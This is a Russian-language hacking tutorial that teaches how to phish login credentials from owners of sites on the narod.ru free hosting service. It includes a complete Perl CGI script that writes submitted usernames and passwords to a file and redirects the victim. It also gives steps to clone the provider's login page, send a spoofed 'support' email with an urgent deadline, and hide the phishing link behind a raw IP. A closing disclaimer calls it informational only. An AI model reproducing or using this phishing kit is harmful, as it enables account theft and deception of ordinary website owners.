Взлом сайтов на narod.ru
Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем на хостинге narod.ru(хотя его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать). Начнём. Для проведения нижеописанных действий вам понадобятся:
1. Мозги
2. Руки
3. Хостинг с поддержкой CGI
4. Небольшое знание HTML
Итак ищем жертву. У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа. Подправляем его, как надо, вставляем туда форму для подтверждения логина и пароля. И получается примерно следующее:
Ещё надо написать write.cgi:
&GetFormInput;
$name=$field{'name'};
$pass=$field{'pass'};
sub GetFormInput {
(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;
if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE " $pass";
print OUTFILE " =======END======= ";
close (OUTFILE);
print "Location: http://your_redirect_URL " ;
Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё осталось только назначить кнопке 'Подтвердить' выполнение скрипта, закачать на хостинг и отослать письмо жертве с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте, ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке (вот тут жертва и отдаст нам пароль)' А для того, чтобы не было понятно, что ссылка не народовская, пользуй nslookup и тогда ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html. Удачи!!!
Эта статья предназначена только для ознакомительных целей. Ни в коем случае не реализовывайте на практике то, что Вы прочитаете, так как Вы несете полную ответственность за свои поступки в соответствии с действующим законодательством. Я не отвечаю за достоверность информации и не несу ответственности за Ваши поступки! Все что вы делаете, вы делаете на свой страх и риск!!!